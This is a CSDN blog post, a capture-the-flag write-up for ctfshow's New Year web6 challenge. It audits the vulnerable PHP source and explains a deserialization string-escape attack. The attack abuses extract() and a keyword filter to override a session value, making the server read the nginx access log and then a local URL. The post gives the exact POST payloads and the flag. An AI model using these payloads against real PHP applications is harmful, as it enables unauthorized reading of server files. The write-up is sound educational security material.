ctfshow新春欢乐赛 web6

已于 2023-12-03 11:20:52 修改
阅读量167 收藏
点赞数 5
文章标签: php 笔记 web安全
于 2023-12-03 10:54:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79131708/article/details/134762122
版权

题目

 <?php
 error_reporting(0);
 highlight_file(__FILE__);
 $function = $_GET['POST'];       //1
 
function filter($img){          //2
    $filter_arr = array('ctfshow','daniu','happyhuyear');  		
    $filter = '/'.implode('|',$filter_arr).'/i';  
    return preg_replace($filter,'',$img);
}
if($_SESSION){                  //3
    unset($_SESSION);
}
$_SESSION['function'] = $function;        //4

extract($_POST['GET']);            //5

$_SESSION['file'] = base64_encode("/root/flag");         //6

$serialize_info = filter(serialize($_SESSION));           //7
if($function == 'GET'){  
    $userinfo = unserialize($serialize_info);             //8
    //出题人已经拿过flag,题目正常,也就是说...  
    echo file_get_contents(base64_decode($userinfo['file']));      //9
}

类型:

字符逃逸

代码审计:

先看源码,1、通过get获取一个值赋给 $function。

2、一个filter函数过滤 $img变量,通过正则表达式 /ctfshow|daniu|happyhuyear/i 匹配,并替换为空。

3、销毁已经设置的session

4、将 $_function的值赋给 $_SESSION[‘function’]

5、提取post提交数组并转换为变量

6、设置file的值

7、将session序列化并过滤赋值给$serialize_info

8、如果 f u n c t i o n 的值为 G E T 就反序列化 function的值为GET就反序列化 function的值为GET就反序列化serialize_info 并赋值给 $userinfo

9、输出base64编码并转换为字符串的文件

wp:

通过题中注释提示,应访问日志文件/var/log/nginx/access.log,也就是将file的值改为base64编码之后的/var/log/nginx/access.log,而题中自动将其覆盖为/root/flag,所以需要利用反序列化字符逃逸。

这里通过get获取?POST=GET

然后通过post获取session的数组,

GET[_SESSION][ctfshowdaniu]=s:1:";s:1:"1";s:4:"file";s:36:"L3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZw==";}

这样传的数组将覆盖session里面的值,为ctfshowdaniu=>s:1:";s:1:"1";s:4:"file";s:36:"L3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZw==";}

原来题中的$serialize_info为

a:2:{s:8:"function";N;s:4:"file";s:16:"L3Jvb3QvZmxhZw==";}

也就是session数组{

“function”=>NULL

“file”=>L3Jvb3QvZmxhZw==

}

而通过post将function的值覆盖后,session为

{

“ctfshowdaniu”=>s:1:";s:1:“1”;s:4:“file”;s:36:“L3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZw==”;}

“file”=>L3Jvb3QvZmxhZw==

}

序列化后为a:2:{s:12:“ctfshowdaniu”;s:70:“s:1:";s:1:“1”;s:4:“file”;s:36:“L3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZw==”;}”;s:4:“file”;s:16:“L3Jvb3QvZmxhZw==”;}

而通过filter函数过滤后变成了a:2:{s:12:“";s:70:"s:1:”;s:1:“1”;s:4:“file”;s:36:“L3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZw==”;}";s:4:“file”;s:16:“L3Jvb3QvZmxhZw==”;}

进行反序列化后即为{

“”;s:70:“s:1:”=>“1”

“file”=>“L3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZw==”

}

即成功将file的值改为 /var/log/nginx/access.log

最后得到

通过读取日志文件,判断flag应该再/ctfshow下面,故应该访问http://127.0.0.1/ctfshow

即post GET[_SESSION][ctfshowdaniu]=s:1:";s:1:"1";s:4:"file";s:32:"aHR0cDovLzEyNy4wLjAuMS9jdGZzaG93";}

即可得到flag

ctfshow{5cb18386-59f0-41c1-937b-8c184bb4a338}

dz233_
关注
  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
20210103 BDFZ新春公开.pdf
06-27
c++竞学习者
新春棋牌比新闻稿件.docx
12-07
此外,新闻稿还提及了其他春节期间的文化活动,如“欢乐传递”、“抛圈夺宝”等游戏,以及“灯谜竞猜”、“折纸花送祝福”等富有传统特色的活动,这些活动不仅丰富了员工的业余生活,也为社区居民带来了节日的欢乐...
新春祝福PSD模板
09-03
【标题】"新春祝福PSD模板"所涉及的知识点主要集中在设计领域,特别是与图形设计软件Photoshop(PSD)的使用相关。在设计行业中,PSD模板是设计师们常用的一种工作工具,它包含了预设的设计元素、布局和图层结构,...
2011兔年新春贺卡程序-其他
06-13
【标题】"2011兔年新春贺卡程序-其他"所涉及的知识点主要集中在网页设计和HTML语言上。这个程序是一个简单的HTML组合页面,主要用于在2011年春节期间向用户展示节日氛围和祝福。它包含了新年背景音乐和贺卡动画效果...
新春图标下载
07-24
新春图标下载】资源包包含了20个专为庆祝新年设计的图标,这些图标具有128x128像素的尺寸,适用于多种用途,包括网站设计、移动应用、桌面软件以及各种喜庆活动的视觉元素。PNG和ICO是两种常见的图标格式,各有其...
Vue3+ element plus 前后分离admin项目安装教程
luck332的专栏
07-21 595
前后分离admin项目安装基于 vue3.x + CompositionAPI + typescript + vite + element plus + vue-router-next + pinia,适配手机、平板、pc 的后台开源免费模板,希望减少工作量,帮助大家实现快速开发。
PHP小课堂】PHP中的数组函数学习(一)
硬核项目经理
07-22 842
PHP中的数组函数学习(一)数组操作可是 PHP 中的重头戏,重头到什么地步呢?别的语言可以说是面向对象、面向过程,PHP 则可以完全说是面向数组的一种语言。它的各种数据结构到最后都可以用数组来表示,这就是很恐怖的一件事。因为不管什么操作,我们都可以以数组的形式操作,这样的话,这些数组操作相关的函数就会显得异常的强大。当然,这也和语言的发展特性分不开。从最开始,PHP 就只是一个准备服务于个人的小...
BUUCTF [WUSTCTF2020]朴实无华
weixin_73399382的博客
07-22 513
第一块就是intval函数的绕过,逻辑上是不存在小于2020又大于2021的数,但是php低版本好像是7点多和以下该函数对不同类型的数据处理有偏差,第二处则是md5函数绕过,
MICA:面向复杂嵌入式系统的混合关键性部署框架
openEuler_的博客
07-23 1021
这种方式存在的问题是:硬件上需要两套系统、集成度不高,通信受限于片外物理机制的限制(如速度、时延等),软件上 Linux 和实时操作系统两者之间是割裂的,在灵活性上、可维护性上存在改进空间。在上述架构中,virtio-rpmsg 相当于网络协议中的 MAC 层,提供高效的底层通信机制,rpmsg 相当于网络协议中的传输层,提供了基于端点(endpoint)与通道(channel)抽象的通信机制,remoteproc 提供不同南向底座的生命周期管理功能,包括初始化、启动、暂停、结束等。MICA 的守护进程。
c++语言实现类似swoole扩展的项目实践
北风之神Boreas
07-24 314
项目本质其实是C++项目开发,学员学习后增加对C++技术栈的实践能力,毕竟互联网的核心基石依然是C/C++。 当你要改变以前吸收的知识来源于国内视频教程,国内文章教程 国内文章资料 转向全球老外大佬云集的github开源项目吸收时,就要学C和C++ 而你以前的IT技术就是国内的教程 国内的社区 国内的文章 ,但都是有局限的,所以要转向github社区吸收开源项目的东西来增强个人技术体系。 技术只来源于实践,不是光看,光记就会的东西,纸上得来终觉浅绝知此事要躬行。
PHP基础语法-Part2
最新发布
weixin_51591328的博客
07-25 250
与其他语言相同。
怎样在 Nginx 中配置基于请求客户端近场通信(NFC)状态的访问控制?
技术笔记
07-25 942
开发自定义模块就像是打造一把专属的宝剑,需要精心设计和磨砺。首先,我们得熟悉 Nginx 的模块开发框架和 API,这是我们的打铁工具和技巧。然后,通过与客户端的通信协议,获取 NFC 状态的数据。在代码实现中,可能会涉及到各种复杂的逻辑和算法,就像在迷宫中寻找出口一样,需要我们保持清醒的头脑和耐心。#include#include#include// 获取 NFC 状态的逻辑//...} else {这只是一个简单的示例框架,实际的开发中还需要处理各种细节和错误情况。
某企业网络及服务器规划与设计
cj13106811623的博客
07-22 1119
在此次系统设计中,我们采用分层设计方法,将网络的逻辑结构化整为零,分层讨论设计与实现的细节问题。将网络拓扑结构划分为3个层次,即核心层、汇聚层和接入层。
rce漏洞-ctfshow(50-70)
m0_74402888的博客
07-23 1101
文件名:
【CTFWP】ctfshow-web42
LongL_GuYu的博客
07-23 925
CTFWP,ctfshow-web42
BGP选路之Next Hop
txs1269928052的博客
07-23 684
根据前面的实验步骤得知,10.0.100.1/32路由在R1上的Next Hop为0.0.0.0,说明当10.0.100.1/32的路由信息在由R1传递至EBGP对等体R2的过程中,Next Hop属性会被自动修改为发送BGP报文的源地址,即 10.0.12.1。R3上的现象与R2上的现象类似,这里不再赘述。为了使R4的BGP路由表中去往10.0.100.1/32的路由信息标记为可用,并放进P路由表中,必须使R4去往10.0.100.1/32的 BGP路由信息中的Next Hop是可达的。
文件上传总结
cyy001128的博客
07-24 906
此过程只会删除上传的文件,但是不会删除生成的文件,因此可以使用如下的php代码获取shell。通过界面上的上传功能上传了一个可执行的脚本文件,而WEB端的系统并未对其进行检测或者检测的逻辑做的不够好,使得恶意用户可以通过文件中上传的一句话木马获得操控权。Windows系统在保存1.php::$DATA一类的文件时会自动去除文件后的::$DATA字符串,保存的文件名为1.php。文件包含漏洞会将任意类型的文件当作php文件进行解析,如果文件中包含了php代码,则其中的php代码将会执行。
BGP选路之Local Preference
txs1269928052的博客
07-23 914
BGP协议在向BGP对等体传递路由时只传递最佳路由,同时,由于IBGP的防环机制,BGP路由器不会将从IBGP对等体那里学到的路由再传递给别的IBGP对等体,因此,R2就不会再向R4传递关于10.0.1.1/32与10.0.100.2/32的路由了,最后的结果是,R4的BGP路由表中最终只存在去往10.0.1.1/32与10.0.100.2/32的下一跳为R3(10.0.3.3)的路由。接下来,我们将对Local Preference值进行修改,使得公司的内部网络发送数据到服务器B时以R3为出口。
导航网站WP主题/WP黑格导航主题BlackCandy-简约酷黑色高逼格+焕然一新的UI设计
hmz856的博客
07-23 459
导航网站WP主题-WP黑格导航主题BlackCandy,它有着简约酷黑色高逼格,而且有焕然一新的UI设计。它是一个简约漂亮的 WordPress 自媒体主题。黑格网址导航主题,自适应电脑端和手机端。BlackCandy-V2.0这次全新升级了!首次推出了专题区(就是推荐分类啦),还能选更多自定义颜色呢!选个你喜欢的颜色,加上全新的UI设计,看起来更扁平、更现代了!
python烟花新春盛宴
02-09
Python烟花新春盛宴是一个由CSDN开发的Python编程活动,旨在庆祝中国传统新年。这个活动提供了一系列有趣的Python编程挑战和项目,让开发者们可以展示他们的编程技能和创造力。 在Python烟花新春盛宴中,你可以参与...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值